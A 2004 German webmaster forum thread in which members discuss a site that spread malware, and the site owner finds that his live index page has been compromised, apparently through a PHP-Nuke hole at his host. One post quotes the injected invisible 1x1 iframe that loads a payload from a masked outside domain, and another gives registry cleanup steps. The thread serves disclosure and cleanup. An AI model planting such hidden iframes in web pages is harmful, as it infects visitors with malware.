an die Mods & Admins die nicht im Urlaub sind

Beitrag von **Southmedia** » 05.04.2004, 16:25

Ich könnte es rausfinden indem ich nohcmal auf die Seite gehe... aber ehrlich gesagt verzichte ich gerne darauf

von **Anzeige von ABAKUS** »

Hochwertiger Linkaufbau bei ABAKUS:

Google-konformer Linkaufbau
nachhaltiges Ranking
Linkbuilding Angebote zu fairen Preisen
internationale Backlinks

Wir bieten Beratung und Umsetzung.
Jetzt anfragen: 0511 / 300325-0

Beitrag von **BLD** » 05.04.2004, 16:38

Mit Opera oder Mozilla wird dir sicher nichts passieren

Beitrag von **sean** » 05.04.2004, 18:01

@southmedia

ich hab noch ein vmware server hier rumfliegen, sogar fertige Linux und windows Images. Muß mal sehn ob ich die vernetzt bekomme, da gabs Probleme. Da kann ich das mal machen ohne Risiko.

Ich probiers gleich mal.

sean

von **Anzeige von ABAKUS** »

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002

persönliche Betreuung
individuelle Beratung
kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.

Beitrag von **Southmedia** » 05.04.2004, 18:06

Ehrlich gesagt hab ich nun aber besseres zu tun als kleinen Scriptkiddies das Gefühl zu geben dass die Viren wirklich was anrichten können ausser Verärgerung...

Beitrag von **sean** » 05.04.2004, 18:14

ja, geht leider auch nicht. Bekomme das VMware nicht ins Netz, das liegt hier an dem router. Ich brauchte das Ding als Datei

So zum entpacken und infizieren sozusagen.

Wenn Du wieder sauber bist ist ja OK, das klang alles so dramatisch vorhin

sean

Beitrag von **wulfo** » 05.04.2004, 18:47

Hallo sean

Ich kann dir das Teil auch zusenden, habe es umbenannt und den Quellqode geöffnet.

Ich befass mich ja mit so ein Sch... nicht

Beitrag von **stp69** » 05.04.2004, 19:49

Moin Moin,

also, für alle 8UN)freiwilligen Opfer... löscht die drei oder vier *html Dateien im %winroot% Verzeichniss. in der Regestry im ordner *run* den Aufruf von dl*.exe löschen und das war es dann. Neustart prüfen und wieder glücklichsein

Beitrag von **sean** » 05.04.2004, 20:25

@wulfo

wenn wieder alles OK ist brauch ich den nicht

Wär nur zum testen.

sean

Beitrag von **renitenz** » 06.04.2004, 12:03

hallo,

bin grad zufällig auf den thread gestossen und aus allen wolken gefallen.
wenn ich das richtig verstanden habe, wird mir vorgeworfen, in einem post (?) einen iframe mit einem link zu einem virus/wurm eigebaut zu haben?
und auf meine seite (www.appartement-24.de) den gleichen link zu haben?
kann mir jemand bitte genau sagen, was da gemeint ist. ich kann weder in dem post von mir (gab bisher erst einen) noch auf meiner seite (schreibe meinen code mit hand, konnte auch keine anomalien feststellen) so etwas finden. ich habe auch keine pn's bekommen. bin selten eingelogt hier im forum unterwegs (nur das eine mal zum beitrag posten und jetzt).
könnt ihr mir bitte mehr informationen geben, gern auch per email (renitenz@gmx.net).
wenn ich hier wirklich irgendwas eingebunden haben sollte, möchte ich mich ENTSCHULDIGEN, das war keine absicht (ich hoffe ihr glaubt das)...

soweit, bin für jede info dankbar!

grüße,

heiner

ps. auch die oben genannte url www.f*-a*.com ist weder von mir, noch ist sie mir bekannt.

Beitrag von **bugscout** » 06.04.2004, 12:06

moin moin,

dann nimm mal schnell das da aus deinen seiten raus

<IFRAME SRC="https://www.f****-a****.com/?d=get" WIDTH="1" HEIGHT="1"></IFRAME>

grüsse

Beitrag von **renitenz** » 06.04.2004, 12:23

oh gott!
habs grad gefunden. ist nur auf der online-version der seite, nicht bei mir auf der platte! dh. jemand hat zugriff auf die seite

habs grad gelöscht, war zum glück nur die index betroffen.
jemand ne idee wie ich rausbekomme, a) wie jemand zugriff bekommen hat und b) wie ich das loch dicht mache?
habe meines wissens keine unsicheren scripts installiert, was kann ich machen???

grüße,

heiner

ps. suche bei google nach "forced action iframe" ergibt 2.900 ergebnisse, scheine da nicht allein zu sein...

Beitrag von **renitenz** » 06.04.2004, 12:32

nachtrag: scheint sich um ein problem in php-nuke zu handeln. scheinbar hat das einer der nutzer meines providers installiert und ein hacker/script kiddie konnte sich so zugriff verschaffen. aber so richtig klar sehe ich immer noch nicht. falls es euch interessiert: provider ist euromediatec. hoster24 scheinen, jedenfalls nach whl-forum (https://forum.webhostlist.de/active/thr ... eID=222433) das gleiche problem zu haben.

nochmal entschuldigung, falls dadurch jemand ärger gehabt haben sollte. tut mir wirklich leid!

heiner

Beitrag von **renitenz** » 06.04.2004, 12:57

achso, @ sean & wulfo
eine email hätte ich sicher gelesen (hab da mit linux kein problem

), wäre in dem fall vielleicht auch die bessere variante gewesen.

naja, jetzt muss ich erst mal wieder runter kommen... *verdammtgestresst-herzklopf*

Beitrag von **sean** » 06.04.2004, 13:38

@renitenz

ja, Email hätte es getan. Dast Du recht.

Na dann mach mal deine Kiste wieder sauber

sean

Beitrag von **wulfo** » 07.04.2004, 14:42

Hallo renitenz, habe am Anfang ja auch geschrieben das die Seite vieleicht auch gehackt wurde.

Und mit mail schreiben habe ich schon geschrieben, darauf achtet heute doch keiner mehr wenn du eine Mail bekommst mit " Sie haben einen Wurm auf Ihre Seite"

In unsere Freemail bekommen wir fast täglich solche Mails, selbst von Seiten die wir garnicht besitzen. Meisten fake, leider.

Deswegen habe ich auch keine Mail geschrieben da so was meist ungelesen weggeht.

kannst du dir vorstellen das währe einen findigen Anwalt auf deiner Seite so passiert?
Von Anspüchen wegen Datenverlust, Dialer, Spyware , Zugriff auf fremden Computer usw, vieles währe da möglich gewesen.
Und nun beweis mal das dieses nicht von Dir kommt wenn es auf deiner Seite liegt.

Na ist ja noch mal gut gegangen,oder?

Gruß wulfo